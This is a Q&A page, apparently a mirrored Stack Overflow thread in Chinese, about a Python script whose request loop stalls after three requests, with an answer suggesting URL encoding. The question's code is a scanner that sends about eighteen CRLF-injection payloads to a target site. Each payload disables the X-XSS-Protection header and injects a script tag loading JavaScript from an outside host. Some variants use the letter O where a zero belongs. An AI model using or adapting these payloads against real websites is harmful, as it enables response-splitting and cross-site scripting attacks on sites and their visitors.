python-3.x - 请求不在 Python3 中发送
问题描述
我有一个包含一些我想发送的请求的数组。基本上我发送的请求是网站+目录(在这种情况下:数组元素)。例如:http://randomwebsite.com/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2Fhttp://anotherwebsite.com%3E%0d%0a0%0d%0a/%2e%2e
我的代码:
import requests
site="http://randomwebsite.com"
tcp_server = "http://anotherwebsite.com"
list_of_requests = [
"/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%0d%0a0%0d%0a/%2e%2e",
"/%0a0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3D" + tcp_server + "%3E%3C%2Fscript%3E",
"/%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%23%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%23%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%23%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%25%30%61X-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%25%30aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%25250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%2e%2e%2f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%2f%2e%2e%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%2F..%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%3f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%3f%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
"/%u000aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E"]
for payload in list_of_requests:
...
[some code here]
...
if str(payload) in requests.get(site + payload).text:
print("Request valid")
else:
print("Request not valid")
我的输出是这样的:
Request not valid
Request not valid
Request not valid
然后程序在发送这 3 个请求后停止,并且永远保持这种状态。我不明白为什么我不继续发送请求。
解决方案
那是因为 URL 没有正确编码。
尝试像这样对它们进行编码urllib.parse:
import requests
import urllib.parse
site="http://randomwebsite.com"
tcp_server = urllib.parse.quote("anotherwebsite.com")
... <rest of your code>
推荐阅读
- python - python - 如何在pyspark中的列中查询None列表的值
- javascript - 如何使用 Js-SDK 删除无效的 Firebase 消息传递令牌?
- javascript - 415 不支持的媒体 - API Post Javascript - Django
- javascript - vue.js 不能在计算方法中使用数据属性
- authorization - 有没有办法在 Scm-Manager 上设置 SVN 路径读取权限
- c++ - GetDlgItem(IDC_STATIC)->SetFont(&m_font) 抛出异常
- mysql - 如何按两个日期中较早/较早的日期排序 SQL 结果?
- azure - Azure DevOps 中是否可以按区域路径的第一个子层进行分组?
- pdf - 如何将许多情节图放在一个文件中并添加文本
- elasticsearch - Elasticsearch 找不到包含“-”的值